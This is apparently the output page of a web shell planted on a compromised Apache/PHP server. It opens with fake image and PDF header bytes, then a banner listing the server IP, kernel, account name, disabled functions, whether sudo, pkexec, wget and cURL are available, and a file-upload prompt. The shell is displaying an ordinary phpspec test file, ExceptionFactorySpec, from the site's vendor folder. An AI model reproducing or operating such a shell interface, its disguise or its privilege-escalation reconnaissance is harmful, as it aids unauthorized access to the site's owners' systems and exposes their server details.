ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.148 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/admin/vendor/phpspec/phpspec/spec/PhpSpec/Exception/ |
Upload File : |
<?php namespace spec\PhpSpec\Exception; use PhpSpec\ObjectBehavior; use Prophecy\Argument; use PhpSpec\Formatter\Presenter\PresenterInterface; class ExceptionFactorySpec extends ObjectBehavior { private $fixture; private $createdException; function let(PresenterInterface $presenter) { $this->beConstructedWith($presenter); $this->fixture = new \stdClass(); $this->fixture->subject = new \stdClass(); $this->fixture->method = 'foo'; $this->fixture->arguments = array('bar'); $this->fixture->classname = '\stdClass'; $this->fixture->property = 'zoo'; } function it_creates_a_named_constructor_not_found_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->classname}::{$this->fixture->method}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->classname}::{$this->fixture->method}\""); $this->fixture->message = 'Named constructor "\stdClass::foo" not found.'; $this->createdException = $this->namedConstructorNotFound( $this->fixture->classname, $this->fixture->method, $this->fixture->arguments ); $this->shouldCreateNamedConstructorNotFoundException(); } function it_creates_a_method_not_found_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->classname}::{$this->fixture->method}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->classname}::{$this->fixture->method}\""); $this->fixture->message = 'Method "\stdClass::foo" not found.'; $this->createdException = $this->methodNotFound( $this->fixture->classname, $this->fixture->method, $this->fixture->arguments ); $this->shouldCreateMethodNotFoundException(); } function it_creates_a_method_not_visible_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->classname}::{$this->fixture->method}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->classname}::{$this->fixture->method}\""); $this->fixture->message = 'Method "\stdClass::foo" not visible.'; $this->createdException = $this->methodNotVisible( $this->fixture->classname, $this->fixture->method, $this->fixture->arguments ); $this->shouldCreateMethodNotVisibleException(); } function it_creates_a_class_not_found_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->classname}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->classname}\""); $this->fixture->message = 'Class "\stdClass" does not exist.'; $this->createdException = $this->classNotFound( $this->fixture->classname ); $this->shouldCreateClassNotFoundException(); } function it_creates_a_property_not_found_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->property}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->property}\""); $this->fixture->message = 'Property "zoo" not found.'; $this->createdException = $this->propertyNotFound( $this->fixture->subject, $this->fixture->property ); $this->shouldCreatePropertyNotFoundException(); } function it_creates_a_calling_method_on_non_object_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->method}()") ->shouldBeCalled() ->willReturn("\"{$this->fixture->method}()\""); $fixtureMessage = "Call to a member function \"{$this->fixture->method}()\" on a non-object."; $exception = $this->callingMethodOnNonObject($this->fixture->method); $exception->shouldHaveType('PhpSpec\Exception\Wrapper\SubjectException'); $exception->getMessage()->shouldBe($fixtureMessage); } function it_creates_a_setting_property_on_non_object_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->property}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->property}\""); $fixtureMessage = "Setting property \"{$this->fixture->property}\" on a non-object."; $exception = $this->settingPropertyOnNonObject($this->fixture->property); $exception->shouldHaveType('PhpSpec\Exception\Wrapper\SubjectException'); $exception->getMessage()->shouldBe($fixtureMessage); } function it_creates_an_accessing_property_on_non_object_exception(PresenterInterface $presenter) { $presenter->presentString("{$this->fixture->property}") ->shouldBeCalled() ->willReturn("\"{$this->fixture->property}\""); $fixtureMessage = "Getting property \"{$this->fixture->property}\" on a non-object."; $exception = $this->gettingPropertyOnNonObject($this->fixture->property); $exception->shouldHaveType('PhpSpec\Exception\Wrapper\SubjectException'); $exception->getMessage()->shouldBe($fixtureMessage); } function shouldCreateNamedConstructorNotFoundException() { $this->createdException->shouldHaveType('PhpSpec\Exception\Fracture\NamedConstructorNotFoundException'); $this->createdException->getMessage()->shouldReturn($this->fixture->message); $this->createdException->getSubject()->shouldBeLike($this->fixture->subject); $this->createdException->getMethodName()->shouldReturn($this->fixture->method); $this->createdException->getArguments()->shouldReturn($this->fixture->arguments); } function shouldCreateMethodNotFoundException() { $this->createdException->shouldHaveType('PhpSpec\Exception\Fracture\MethodNotFoundException'); $this->createdException->getMessage()->shouldReturn($this->fixture->message); $this->createdException->getSubject()->shouldBeLike($this->fixture->subject); $this->createdException->getMethodName()->shouldReturn($this->fixture->method); $this->createdException->getArguments()->shouldReturn($this->fixture->arguments); } function shouldCreateMethodNotVisibleException() { $this->createdException->shouldHaveType('PhpSpec\Exception\Fracture\MethodNotVisibleException'); $this->createdException->getMessage()->shouldReturn($this->fixture->message); $this->createdException->getSubject()->shouldBeLike($this->fixture->subject); $this->createdException->getMethodName()->shouldReturn($this->fixture->method); $this->createdException->getArguments()->shouldReturn($this->fixture->arguments); } function shouldCreateClassNotFoundException() { $this->createdException->shouldHaveType('PhpSpec\Exception\Fracture\ClassNotFoundException'); $this->createdException->getMessage()->shouldReturn($this->fixture->message); $this->createdException->getClassname()->shouldReturn($this->fixture->classname); } function shouldCreatePropertyNotFoundException() { $this->createdException->shouldHaveType('PhpSpec\Exception\Fracture\PropertyNotFoundException'); $this->createdException->getMessage()->shouldReturn($this->fixture->message); $this->createdException->getSubject()->shouldReturn($this->fixture->subject); $this->createdException->getProperty()->shouldReturn($this->fixture->property); } }